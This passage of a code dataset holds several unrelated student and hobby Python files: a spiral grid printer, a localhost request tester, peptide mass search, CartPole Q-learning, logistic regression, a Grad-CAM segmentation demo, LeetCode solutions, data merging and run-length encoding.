print(spiral_numbers(4))\n1 2\n4 3\n\n>>> print(spiral_numbers(9))\n7 8 9\n6 1 2\n5 4 3\n\n>>> print(spiral_numbers(25))\n21 22 23 24 25\n20 7 8 9 10\n19 6 1 2 11\n18 5 4 3 12\n17 16 15 14 13\n\n>>> print(spiral_numbers(40))\n 21 22 23 24 25 26\n 20 7 8 9 10 27\n40 19 6 1 2 11 28\n39 18 5 4 3 12 29\n38 17 16 15 14 13 30\n37 36 35 34 33 32 31\n\"\"\"\n\nfrom typing import Tuple, Dict\nfrom enum import Enum\n\n\nPos = Tuple[int, int]\n\n\nclass Dir(Enum):\n RIGHT = 0\n DOWN = 1\n LEFT = 2\n UP = 3\n\n\ndef turn_right(d: 
Dir) -> Dir:\n \"\"\"\n >>> turn_right(Dir.RIGHT)\n <Dir.DOWN: 1>\n \"\"\"\n return Dir((d.value + 1) % 4)\n\n\ndef one_forward(p: Pos, d: Dir):\n \"\"\"\n >>> one_forward((-1, -1), Dir.RIGHT)\n (0, -1)\n \"\"\"\n x, y = p\n if d == Dir.RIGHT:\n return (x + 1, y)\n elif d == Dir.DOWN:\n return (x, y + 1)\n elif d == Dir.LEFT:\n return (x - 1, y)\n elif d == Dir.UP:\n return (x, y - 1)\n\n\ndef spiral_numbers_grid(limit: int) -> Dict[Pos, int]:\n # Start with the number 1 already added.\n grid = {(0, 0): 1}\n pos = (0, 0)\n num = 1\n direction = Dir.UP\n\n # Always try to turn right, but if that fails, go straight.\n while num < limit:\n num += 1\n\n new_dir_1 = turn_right(direction)\n new_pos_1 = one_forward(pos, new_dir_1)\n\n new_dir_2 = direction\n new_pos_2 = one_forward(pos, direction)\n\n if new_pos_1 not in grid:\n pos = new_pos_1\n direction = new_dir_1\n elif new_pos_2 not in grid:\n pos = new_pos_2\n direction = new_dir_2\n\n grid[pos] = num\n\n return grid\n\n\ndef spiral_numbers(limit: int) -> str:\n # Generate a grid of numbers in a spiral.\n grid = spiral_numbers_grid(limit)\n\n # Iterate rows of the grid, printing each number. Print spaces if a number is missing.\n # Add padding to keep numbers aligned horizontally.\n min_x = min( x for (x, y) in grid.keys() )\n max_x = max( x for (x, y) in grid.keys() )\n min_y = min( y for (x, y) in grid.keys() )\n max_y = max( y for (x, y) in grid.keys() )\n\n max_digits = max( len(str(n)) for n in grid.values() )\n\n rows = []\n for y in range(min_y, max_y + 1):\n row = []\n for x in range(min_x, max_x + 1):\n n = grid.get((x, y))\n if n is None:\n row.append(' ' * max_digits)\n else:\n row.append('{:>{}d}'.format(n, max_digits))\n rows.append(row)\n\n return '\\n'.join( ' '.join(row) for row in rows )\n","repo_name":"christian-oudard/quiz_interview","sub_path":"spiral_numbers.py","file_name":"spiral_numbers.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39839084020","text":"import threading\nimport requests\n\ndef doget():\n requests.get(\"http://localhost:5000/\")\n print(\"did request\")\n\n\nthreads = []\nfor i in range(1, 101):\n t = threading.Thread(target=doget)\n threads.append(t)\nfor t in threads:\n t.start()\n","repo_name":"dat310-spring20/course-info","sub_path":"examples/python/flask/test/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"21881698499","text":"sortedMassData = []\r\nfor element in sortedMassData_temp: #loop to create float based storage type\r\n sortedMassData.append([float(element[0]), float(element[1]), float(element[2])])\r\n\r\ndef binarySearchInPeaks(item, item_index):\r\n alist = peaks\r\n first = 0\r\n last = len(alist)-1\r\n found = False\r\n while first<=last and not found:\r\n midpoint = (first + last)//2\r\n if abs(alist[midpoint] - item) <= 0.001:\r\n found = True\r\n elif (abs(item + 57.02146 - alist[midpoint]) < 0.001 and 'C' in SequenceArray[item_index[0]][item_index[1]]):\r\n found = True\r\n elif (abs(item + 15.99491 - alist[midpoint]) < 0.001 and 'M' in SequenceArray[item_index[0]][item_index[1]]):\r\n found = True\r\n else:\r\n if item > alist[midpoint]:\r\n last = midpoint-1\r\n else:\r\n first = midpoint+1\r\n return found\r\n\r\ndef binarySearchinSorted(item):\r\n alist = sortedMassData\r\n first = 0\r\n last = len(alist)-1\r\n found = 
False\r\n    position = -1 # default so the return below is always defined when the item is absent\r\n    while first<=last and not found:\r\n        midpoint = (first + last)//2\r\n        if abs(alist[midpoint][0] - item) <= 0.001:\r\n            found = True\r\n            position = midpoint\r\n        else:\r\n            if item > alist[midpoint][0]:\r\n                last = midpoint-1\r\n            else:\r\n                first = midpoint+1\r\n    return [found, position]\r\n\r\nset1 = []\r\n\r\ndef SimpleSearchinPeaks(item, item_index): #returns whether a particular peptide is present in the peaks\r\n    found = False\r\n    for peak in peaks:\r\n        if abs(peak - item) <= 0.001:\r\n            found = True\r\n        elif abs(item + 57.02146 - peak) < 0.001 and 'C' in SequenceArray[item_index[0]][item_index[1]]:\r\n            found = True\r\n        elif abs(item + 15.99491 - peak) < 0.001 and 'M' in SequenceArray[item_index[0]][item_index[1]]:\r\n            found = True\r\n    return found\r\n\r\ndef main():\r\n    for index1 in range(len(MassData)):\r\n        print(index1, \", \", end = '')\r\n        for index2 in range(len(MassData[index1])):\r\n            if SimpleSearchinPeaks(MassData[index1][index2], [index1, index2]):\r\n                if MassData[index1] not in set1:\r\n                    set1.append([ProteinList[index1], SequenceArray[index1][index2], MassArray[index1][index2]])\r\n                \"\"\"else:\r\n                    set1[set1.index(MassData[index1])].append(SequenceArray[index1][index2], MassArray[index1][index2])\"\"\"\r\n","repo_name":"garvitgoel/masters-thesis-peptide-mass-fingerprinting-algorithm","sub_path":"Core Modules/Protein Finder/ProteinFinder1.py","file_name":"ProteinFinder1.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27368806229","text":"import gym\nimport gym.spaces\nimport matplotlib\n# matplotlib.use(\"Agg\") # use noninteractive backend\nimport matplotlib.pyplot as plt\n\ngym.logger.set_level(40)\ngym.__version__\n\nimport autograd.numpy as np\nfrom autograd import grad, elementwise_grad\nimport random\n\n### Model ---------------------------------------------------------------------\n# Linear approximation function to expected returns\ndef approx(weights, observation, action):\n    return np.dot(observation, weights)[action]\n\ndef policy(env, weights, observation, epsilon):\n    actions = [0, 1]\n    if np.random.rand() < epsilon:\n        return random.choice(actions)\n\n    qs = []\n    for action in actions:\n        qs.append(approx(weights, observation, action))\n    return np.argmax(qs)\n\ndapprox = grad(approx)\ndiscount = 1.0 # Discount rate\nepsilon = 0.2 # Exploration rate\nalpha = 0.1 # Step size for gradient descent\nw = np.zeros((4,2)) # Initialize weights\nnum_episodes = 1000 # Number of games for the agent to play\nmax_steps = 200\n\n### Plotting --------------------------------------------------------------------\nimport os\nimport shutil\nimport tempfile\nimport subprocess\nanim_path = \"./monitor\"\nif not os.path.isdir(anim_path): os.makedirs(anim_path)\n\ndef save_frames(frames, anim_path):\n    temp_dir = tempfile.mkdtemp(dir = anim_path)\n    for i, frame in enumerate(frames[-200:]):\n        plt.imsave(*(\"{}/{}.png\".format(temp_dir, i), frame),\n                   **{\"vmin\":0, \"vmax\":255})\n    subprocess.run(\"ffmpeg -y -f image2 -i {0}/%d.png {0}/video.avi\".format(temp_dir),\n                   shell = True)\n    subprocess.run(\"ffmpeg -y -i {}/video.avi -r 9 {}/anim.gif\".format(temp_dir, anim_path),\n                   shell = True)\n\n    shutil.rmtree(temp_dir) # os.rmdir would fail here: the directory still holds the PNG frames and video.avi\n\n\n### Training ------------------------------------------------------------------\nfrom collections import deque\nfrom gym import wrappers\n\nenv = gym.make('CartPole-v0')\nepisode_rewards = []\nfor ep in range(num_episodes):\n    state = env.reset()\n    rewards = []\n    frames = deque(maxlen = 
500)\n    for _ in range(max_steps):\n        # Take smart action based on defined policy\n        action = policy(env, w, state, epsilon)\n\n        q_hat = approx(w, state, action)\n        q_hat_grad = dapprox(w, state, action)\n        next_state, reward, done, _ = env.step(action)\n        rewards.append(reward)\n        # Render into buffer.\n        visframe = env.render(mode = 'rgb_array')\n        frames.append(visframe)\n        if done:\n            w += alpha*(reward - q_hat) * q_hat_grad\n            break\n        else:\n            # Update weights to maximize for reward\n            # TD target is reward + discount*q_hat_next, so the error is (target - q_hat)\n            next_action = policy(env, w, next_state, epsilon)\n            q_hat_next = approx(w, next_state, next_action)\n            w += alpha*(reward + discount*q_hat_next - q_hat)*q_hat_grad\n            state = next_state\n    # Regularizer\n    # as we learn more about the game, become more certain in making decisions\n    if ep == 100:\n        epsilon /= 2\n\n    episode_rewards.append(np.sum(rewards))\n    mean_reward=np.mean(episode_rewards[max(ep-100, 0):ep+1])\n\n    # Report on progress - did we solve the task already?\n    if mean_reward >= 195.0 and ep >= 100:\n        print(\"Episodes before solve {}\".format(ep-100+1))\n        save_frames(frames, anim_path)\n        break\n    if ((ep % 100) == 0) and ep > 0:\n        print(\"Episode {}/{} finished. Mean reward over last 100 episodes: {:.2f}\"\\\n        .format(ep, num_episodes, (mean_reward)))\nenv.close()\n","repo_name":"martinholub/demos-blogs-examples","sub_path":"rl-gym/cartpole/cartpole_simple.py","file_name":"cartpole_simple.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6472181593","text":"# A binary adder calculator.\n# By: Rafael Sanchez\n\nimport sys\n\ndef parse_line(bin_string):\n    return bin_string.replace('\\n','').split(',')\n\ndef turn_to_int_array(str_num):\n    int_arr = []\n    for i in range(0, len(str_num)):\n        int_arr.append(int(str_num[i]))\n    int_arr.reverse()\n    return int_arr\n\ndef addBinaryHelper(num1, num2, carry):\n    if (num1 == [] or num2 == []) and carry == 1:\n        return [carry]\n    if (num1 == [] or num2 == []) and carry == 0:\n        return []\n    if num1[0] + num2[0] + carry == 0:\n        return [0] + addBinaryHelper(num1[1:], num2[1:], 0)\n    if num1[0] + num2[0] + carry == 1:\n        return [1] + addBinaryHelper(num1[1:], num2[1:], 0)\n    if num1[0] + num2[0] + carry == 2:\n        return [0] + addBinaryHelper(num1[1:], num2[1:], 1)\n    if num1[0] + num2[0] + carry == 3:\n        return [1] + addBinaryHelper(num1[1:], num2[1:], 1)\n\ndef addBinary(num1, num2):\n    if len(num1) == len(num2):\n        return addBinaryHelper(num1, num2, 0)\n    if len(num1) < len(num2):\n        EditedNum1 = num1 + ([0]*(len(num2)-len(num1)))\n        return addBinaryHelper(EditedNum1, num2, 0)\n    if len(num1) > len(num2):\n        EditedNum2 = num2 + ([0]*(len(num1)-len(num2)))\n        return addBinaryHelper(num1, EditedNum2, 0)\n\ndef concat(arr):\n    for i in range(0, len(arr)):\n        if arr[i] == 0:\n            arr[i] = -1\n        if arr[i] == 1:\n            break\n    result_str = \"\"\n    for i in range(0, len(arr)):\n        if arr[i] == -1:\n            continue\n        else:\n            result_str = result_str + str(arr[i])\n    return result_str\n\nprint(\"Enter two binary numbers separated by commas (Ex: 010,110): \")\n\nfor line in sys.stdin:\n    bin_pair = parse_line(line)\n    int_array_0 = turn_to_int_array(bin_pair[0])\n    int_array_1 = turn_to_int_array(bin_pair[1])\n    result = addBinary(int_array_0,int_array_1)\n    result.reverse()\n    fin = concat(result)\n    if (fin == \"\"):\n        fin = \"0\"\n    print(\"Addition result: \" + fin)\n    \n    \n\n\n","repo_name":"rsanche4/School-Projects","sub_path":"Projects for 
CS-115/binary_adder.py","file_name":"binary_adder.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14028614863","text":"import numpy as np\nfrom sklearn import preprocessing\nfrom sklearn import datasets\n\n\nclass LogisticRegression:\n    def __init__(self, learning_rate=0.1, lamb=0.001, iters=1000, kernel='sigmoid'):\n        self.learning_rate = learning_rate  # learning rate, default 0.1\n        self.lamb = lamb  # regularization parameter, default 0.001\n        self.iters = iters  # maximum number of iterations\n        self.kernel = kernel  # kernel function, 'sigmoid' or 'softmax'\n        self.theta = np.zeros((1, 1))  # declare the parameters as a 2-D array\n        self.cost = []  # record of loss values\n\n    @staticmethod\n    def sigmoid(features, theta):\n        \"\"\"\n        Logistic function for binary classification; all data sets are in np.array format\n        :param features: feature set m*(n+1), m = number of samples, n = number of features\n        :param theta: parameter set k*(n+1), k = number of label classes, n = number of features\n        :return: result of the function\n        \"\"\"\n        inner = np.dot(features, theta.T)  # compute the inner product\n        return 1 / (1 + np.exp(-inner))\n\n    @staticmethod\n    def softmax(features, theta):\n        \"\"\"\n        softmax function for multi-class classification; all data sets are in np.array format\n        :param features: feature set m*(n+1), m = number of samples, n = number of features\n        :param theta: parameter set k*(n+1), k = number of label classes, n = number of features\n        :return: result of the function\n        \"\"\"\n        inner = features.dot(theta.T)\n        return np.exp(inner) / np.sum(np.exp(inner), axis=1, keepdims=True)  # inner has shape m*k; with these np.sum arguments the row sums keep shape m*1\n\n    def cal_cost(self, features, target, theta, lamb):\n        \"\"\"\n        Compute the cost function (log loss) with L2 regularization\n        :param features: feature set m*(n+1), m = number of samples, n = number of features\n        :param target: target set m*k, k = number of classes\n        :param theta: parameter set k*(n+1), k = number of label classes, n = number of features\n        :param lamb: regularization parameter, default 0.001\n        :return: log loss\n        \"\"\"\n        m = features.shape[0]  # number of samples\n        if self.kernel == 'sigmoid':\n            inner = self.sigmoid(features, theta)  # softmax and sigmoid share the same loss formula\n        else:\n            inner = self.softmax(features, theta)\n        first = np.multiply(-target, np.log(inner))  # first half\n        second = np.multiply((1 - target), np.log(1 - inner))  # second half\n        reg = lamb / (2 * m) * np.sum(np.power(theta[:, 1:], 2))  # regularization\n        return np.sum(first - second) / m + reg\n\n    def training(self, features, target):\n        \"\"\"\n        Optimize with batch gradient descent\n        :param features: feature set m*n, m = number of samples, n = number of features\n        :param target: target set m*k, k = number of classes\n        :return: updates the parameters and loss in place; returns nothing\n        \"\"\"\n        features = np.insert(features, 0, 1, axis=1)  # add a column x0=1 to the feature set to simplify the matrix operations\n        m, n = features.shape\n        k = target.shape[1]  # number of target classes\n        self.theta = np.zeros((k, n))  # here n = number of features + 1\n        for _ in range(self.iters):  # gradient descent\n            if self.kernel == 'sigmoid':\n                inner = self.sigmoid(features, self.theta)\n            else:\n                inner = self.softmax(features, self.theta)\n\n            error = inner - target  # error\n            grad = error.T.dot(features) / m + self.lamb / m * self.theta  # compute the gradient\n            grad[:, 0] = np.sum(error, axis=0) / m  # the previous step regularized every theta; recompute theta0's gradient to undo its regularization\n            self.theta -= self.learning_rate * grad  # update theta\n            self.cost.append(self.cal_cost(features, target, self.theta, self.lamb))  # record the current loss\n        return\n\n    def predict(self, features, threshold=0.5):\n        \"\"\"\n        Output predictions from the input feature set and the parameters theta\n        :param features: samples to predict, 1*n, n = number of features\n        :param threshold: threshold, default 0.5; at or above it the positive class is output, otherwise the negative class. Only used when kernel=sigmoid\n        :return: if kernel=sigmoid, outputs 1 or 0 (positive or negative class); if kernel=softmax, outputs the index of the most probable class, m*1\n        \"\"\"\n        features = np.insert(features, 0, 1, axis=1)\n        if self.kernel == 'sigmoid':\n            inner = self.sigmoid(features, self.theta)\n            return [1 if i[0] >= threshold else 0 for i in inner]\n        else:\n            inner = self.softmax(features, self.theta)\n            return np.argmax(inner, axis=1)  # index of the most probable class\n\n\ndef test_sigmoid():  # test sigmoid on two-class data generated with sklearn\n    features, target = datasets.make_classification(n_samples=300)\n    target = target.reshape(target.shape[0], 1)\n\n    lr = LogisticRegression()\n    lr.training(features, target)\n    
predict = lr.predict(features)  # get the index of the most probable class\n    correct = [0 if a ^ b else 1 for a, b in zip(predict, target)]\n    accuracy = correct.count(1) / len(correct)  # compute the accuracy\n    print('accuracy={}%'.format(accuracy * 100))\n\n\ndef test_softmax():\n    \"\"\"Testing on the iris data set reaches about 93% prediction accuracy.\n    Testing softmax on multi-class data generated with sklearn, the accuracy drops quickly as the number of classes grows; the reason may be that the generated data has no good linear relationship\n    \"\"\"\n    # features, target = datasets.make_classification(n_samples=5000, n_informative=4, n_classes=5)\n    dataset = datasets.load_iris()  # iris data set\n    features, target = dataset['data'], dataset['target']\n    target = target.reshape(-1, 1)\n    enc = preprocessing.OneHotEncoder()\n    target_train = enc.fit_transform(target).toarray()  # one-hot encode the target set\n\n    lr = LogisticRegression(learning_rate=0.001, lamb=0, iters=5000, kernel='softmax')\n    lr.training(features, target_train)\n    predict = lr.predict(features)\n    correct = [1 if a == b else 0 for a, b in zip(predict, target)]  # in this example the class index happens to equal the original label\n    accuracy = correct.count(1) / len(correct)\n    print('accuracy={}%'.format(accuracy * 100))\n\n\ntest_sigmoid()\ntest_softmax()\n","repo_name":"FanziSufu/Simple-ML","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1019344467","text":"\"\"\"\npython3\n-- coding: utf-8 --\n-------------------------------\n@Author : RAO ZHI\n@Email : raozhi@mails.cust.edu.cn\n-------------------------------\n@File : Semantic Segmentation.py\n@Software : PyCharm\n@Time : 2023/4/26 19:05\n-------------------------------\n\"\"\"\n\nimport warnings\n\nfrom matplotlib import pyplot as plt\n\nwarnings.filterwarnings('ignore')\nwarnings.simplefilter('ignore')\nfrom torchvision.models.segmentation import deeplabv3_resnet50\nimport torch\nimport torch.functional as F\nimport numpy as np\nimport requests\nimport torchvision\nfrom PIL import Image\nfrom pytorch_grad_cam.utils.image import show_cam_on_image, preprocess_image\n\n# image_url = \"https://farm1.staticflickr.com/6/9606553_ccc7518589_z.jpg\"\n# image = np.array(Image.open(requests.get(image_url, stream=True).raw))\n\nimage_path = \"9606553_ccc7518589_z.jpg\"\nimage = np.array(Image.open(image_path))\n\nrgb_img = np.float32(image) / 255\ninput_tensor = preprocess_image(rgb_img,\n                                mean=[0.485, 0.456, 0.406],\n                                std=[0.229, 0.224, 0.225])\n# Taken from the torchvision tutorial\n# https://pytorch.org/vision/stable/auto_examples/plot_visualization_utils.html\nmodel = deeplabv3_resnet50(pretrained=True, progress=False)\nmodel = model.eval()\n\nif torch.cuda.is_available():\n    model = model.cuda()\n    input_tensor = input_tensor.cuda()\n\noutput = model(input_tensor)\nprint(type(output), output.keys())\n\n\"\"\"\nThis package assumes the model will output a tensor. Here, instead, it's returning a dictionary with the \"out\" and \"aux\" keys, \nwhere the actual result we care about is in \"out\". 
This is a common issue with custom networks, \nsometimes the model outputs a tuple, for example, and maybe you care only about one of its outputs.\n\nTo solve this we're going to wrap the model first.\n\"\"\"\n\n\nclass SegmentationModelOutputWrapper(torch.nn.Module):\n    def __init__(self, model):\n        super(SegmentationModelOutputWrapper, self).__init__()\n        self.model = model\n\n    def forward(self, x):\n        return self.model(x)[\"out\"]\n\n\nmodel = SegmentationModelOutputWrapper(model)\noutput = model(input_tensor)\nprint(output)\n# output_matrix = output.view(375, 500).detach().cpu().numpy()\noutput_set = output[:, 0, :, :]\noutput_set_matrix = output_set.view(375, 500).detach().cpu().numpy()\n\nnormalized_masks = torch.nn.functional.softmax(output, dim=1).cpu()\n# normalized_masks = normalized_masks[:, 0, :, :]\n# normalized_masks_matrix = normalized_masks.view(375, 500).detach().cpu().numpy()\n\n\nsem_classes = [\n    '__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\n    'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n    'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'\n]\nsem_class_to_idx = {cls: idx for (idx, cls) in enumerate(sem_classes)}\n\ncar_category = sem_class_to_idx[\"car\"]\n# xx = normalized_masks[0, :, :, :].argmax(axis=0)\ncar_mask = normalized_masks[0, :, :, :].argmax(axis=0).detach().cpu().numpy()\ncar_mask_uint8 = 255 * np.uint8(car_mask == car_category)\ncar_mask_float = np.float32(car_mask == car_category)\n\nboth_images = np.hstack((image, np.repeat(car_mask_uint8[:, :, None], 3, axis=-1)))\nImage.fromarray(both_images)\n\nplt.imshow(Image.fromarray(both_images))\nplt.show()\n\nfrom pytorch_grad_cam import GradCAM\n\n\nclass SemanticSegmentationTarget:\n    def __init__(self, category, mask):\n        self.category = category\n        self.mask = torch.from_numpy(mask)\n        if torch.cuda.is_available():\n            self.mask = self.mask.cuda()\n\n    def __call__(self, model_output):\n        return (model_output[self.category, :, :] * self.mask).sum()\n\n\ntarget_layers = [model.model.backbone.layer4]\ntargets = [SemanticSegmentationTarget(car_category, car_mask_float)]\nwith GradCAM(model=model,\n             target_layers=target_layers,\n             use_cuda=torch.cuda.is_available()) as cam:\n    grayscale_cam = cam(input_tensor=input_tensor,\n                        targets=targets)[0, :]\n    cam_image = show_cam_on_image(rgb_img, grayscale_cam, use_rgb=True)\n\nImage.fromarray(cam_image)\nplt.imshow(Image.fromarray(cam_image))\nplt.show()\n","repo_name":"shahelaojieraozhi/DL_gogo","sub_path":"code_patch/pytorch-grad-cam-master/Semantic Segmentation.py","file_name":"Semantic Segmentation.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72750550866","text":"# -*- coding:utf-8 -*- \n\n\n'''\n43. 
Multiply Strings\nGiven two non-negative integers num1 and num2 represented as strings, return the product of num1 and num2.\nNote:\nThe length of both num1 and num2 is < 110.\nBoth num1 and num2 contain only digits 0-9.\nBoth num1 and num2 do not contain any leading zero.\nYou must not use any built-in BigInteger library or convert the inputs to integer directly.\n'''\nclass Solution(object):\n    def multiply(self, num1, num2):\n        \"\"\"\n        :type num1: str\n        :type num2: str\n        :rtype: str\n        \"\"\"\n        ans = [0] * (len(num1) + len(num2))\n        for i, n1 in enumerate(reversed(num1)):\n            for j, n2 in enumerate(reversed(num2)):\n                ans[i + j] += int(n1) * int(n2)\n                ans[i + j + 1] += ans[i + j] // 10  # floor division keeps the carry an int on both Python 2 and 3\n                ans[i + j] %= 10\n        while len(ans) > 1 and ans[-1] == 0:\n            ans.pop()\n        return \"\".join(map(str, ans[::-1]))\n\n\n'''\n46. Permutations\nGiven a collection of distinct numbers, return all possible permutations.\n\nFor example,\n[1,2,3] has the following permutations:\n[\n  [1,2,3],\n  [1,3,2],\n  [2,1,3],\n  [2,3,1],\n  [3,1,2],\n  [3,2,1]\n]\n'''\nclass Solution(object):\n    def permute(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        result = []\n        self.get_permute([], nums, result)\n        return result\n\n    def get_permute(self, current, num, result):\n        if not num:\n            result.append(current + [])\n            return\n        for i, v in enumerate(num):\n            current.append(num[i])\n            self.get_permute(current, num[:i] + num[i + 1:], result)\n            current.pop()\n\n'''\na version via dfs\nclass Solution(object):\n    def permute(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        res = []\n        visited = set([])\n        def dfs(nums, path, res, visited):\n            if len(path) == len(nums):\n                res.append(path + [])\n                return\n            \n            for i in xrange(0, len(nums)):\n                # if i > 0 and nums[i - 1] == nums[i]:\n                #     continue\n                if i not in visited:\n                    visited.add(i)\n                    path.append(nums[i])\n                    dfs(nums, path, res, visited)\n                    path.pop()\n                    visited.discard(i)\n        \n        dfs(nums, [], res, visited)\n        return res\n'''\n\n\n'''\n47. 
Permutations II\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\nFor example,\n[1,1,2] has the following unique permutations:\n[\n  [1,1,2],\n  [1,2,1],\n  [2,1,1]\n]\n\n'''\nclass Solution(object):\n    def permuteUnique(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        result = []\n        nums.sort()\n        self.get_permute([], nums, result)\n        return result\n\n    def get_permute(self, current, num, result):\n        if not num:\n            result.append(current + [])\n            return\n        for i, v in enumerate(num):\n            if i - 1 >= 0 and num[i] == num[i - 1]:\n                continue\n            current.append(num[i])\n            self.get_permute(current, num[:i] + num[i + 1:], result)\n            current.pop()\n\n'''\na dfs version\nclass Solution(object):\n    def permuteUnique(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        res = []\n        nums.sort()\n        def dfs(nums, res, path, visited):\n            if len(path) == len(nums):\n                res.append(path + [])\n                return\n            \n            for i in range(len(nums)):\n                if i in visited:\n                    continue\n                if i > 0 and nums[i] == nums[i - 1] and i - 1 not in visited:\n                    continue\n                visited |= {i}\n                path.append(nums[i])\n                dfs(nums, res, path, visited)\n                path.pop()\n                visited -= {i}\n        \n        dfs(nums, res, [], set())\n        return res\n'''","repo_name":"FelixSeptem/Practice","sub_path":"LeetCode/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74871872786","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\n\n# Import first data file.\n# Set timestamp column as the index.\n# Skip rows 1,2 because they're useless.\n# Normalize date-time format.\ndf1 = pd.read_csv('wind_data.csv', index_col=0, skiprows=[1,2])\ndf1.index = pd.to_datetime(df1.index)\nprint(df1)\n\n# Import second data file.\ndf2 = pd.read_csv('powerstation.csv', parse_dates={'timestamp':[0,1]}, index_col=0)\nprint(df2)\n\n# Merge both data sets using an outer join.\n#\tNote: Change to 'inner' for an inner join.\ndf3 = pd.merge(df2, df1, left_index=True, right_index=True, how='outer')\nprint(df3)\n\n# Fill in all NaNs with 0s. 
\n# \tNote: Does not fill in \"empty\" cells.\ndf3.power_output = pd.to_numeric(df3.power_output, errors='coerce').fillna(0).astype(np.float64)\ndf3.Ts_Avg = pd.to_numeric(df3.Ts_Avg, errors='coerce').fillna(0).astype(np.float64)\ndf3.wnd_dir_compass = pd.to_numeric(df3.wnd_dir_compass, errors='coerce').fillna(0).astype(np.float64)\ndf3.wnd_spd = pd.to_numeric(df3.wnd_spd, errors='coerce').fillna(0).astype(np.float64)\n\n# Export merged dataset to csv.\ndf3.to_csv('total.csv')\n\n# Normalize data using sklearn library\nx = df3.values\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x)\ndf4 = pd.DataFrame(x_scaled)\n\ndf4.plot()\nplt.show()\n\n######## PROBABLY USELESS STUFF ##############\n# df3.plot(x=df3.index, y=[\"power_output\", \"Ts_Avg\", \"wnd_dir_compass\", \"wnd_spd\"])\n# df3.plot(x=df3.index, y=\"power_output\")\n# df3.plot(x=df3.index, y=\"Ts_Avg\")\n# df3.plot(x=df3.index, y= \"wnd_dir_compass\")\n# df3.plot(x=df3.index, y=\"wnd_spd\")\n# plt.savefig('figure.png')","repo_name":"brandonsayers/MicrogridPrediction","sub_path":"DataProcessingShtuff/processDataPanda.py","file_name":"processDataPanda.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72975021586","text":"import sys\nimport time\n\nsys.path.append(\"..\")\nfrom AxoController import AxoController  # noqa: E402\n\n\ndef main():\n    port = \"COM3\"\n    axo_ctrl = AxoController(port=port, angle_telorance=[20, 60, 80, 5])\n    # axo_ctrl.close_receive_info()\n    # axo_ctrl.enter_control_mode()\n\n    # axo_ctrl.set_all_motors_pos_sync([10, 0, 10, 0])\n\n    # axo_ctrl.set_all_motors_pos_sync([40, -30, 40, -30])\n\n    # axo_ctrl.exit_control_mode()\n    # time.sleep(10)\n    start_t = time.time()  # record the start time; time.sleep() returns None\n    time.sleep(100)\n    # for i in range(15):\n    #     axo_ctrl.change_control_mode(\"position\")\n    #     axo_ctrl.set_all_motors_pos_async([0, 0, 0, 0])\n\n    # print(f\"change control mode time is {time.time() - start_t}\")\n    axo_ctrl.close_controller()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Beanpow/AxoController","sub_path":"src/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7726208336","text":"def encode(message):\n    encoded=\"\"\n    i=0\n    while(i<len(message)):\n        count=1\n        ch=message[i]\n        j=i\n        while(j<len(message)-1):\n            if(message[j]==message[j+1]):\n                count=count+1\n                j=j+1\n            else:\n                break\n        encoded+=str(count)+ch\n        i=j+1\n    return encoded\n\n#Provide different values for message and test your program\nencoded_message=encode(\"ABBBBCCCCCCCCAB\")\nprint(encoded_message)\n","repo_name":"SreehariKarthikeyan/Infosys-Python-Exercises","sub_path":"Assignment Set - 3-Strings-Encoded.py","file_name":"Assignment Set - 3-Strings-Encoded.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13300235494","text":"from datetime import datetime\n\nSTARTING_TIME = datetime(2022, 3, 18, 8, 0, 0)\nSTARTING_DATE_STR = '2022-03-18'\n\n\ndef return_time_info():\n    \"\"\"Returns time information\n\n    Command line interface code that validates user input and returns a time in seconds, used to report on the package deliveries\n\n    Args:\n        N/A: This function takes no arguments\n\n    Returns:\n        time_difference.total_seconds(): This function returns a 
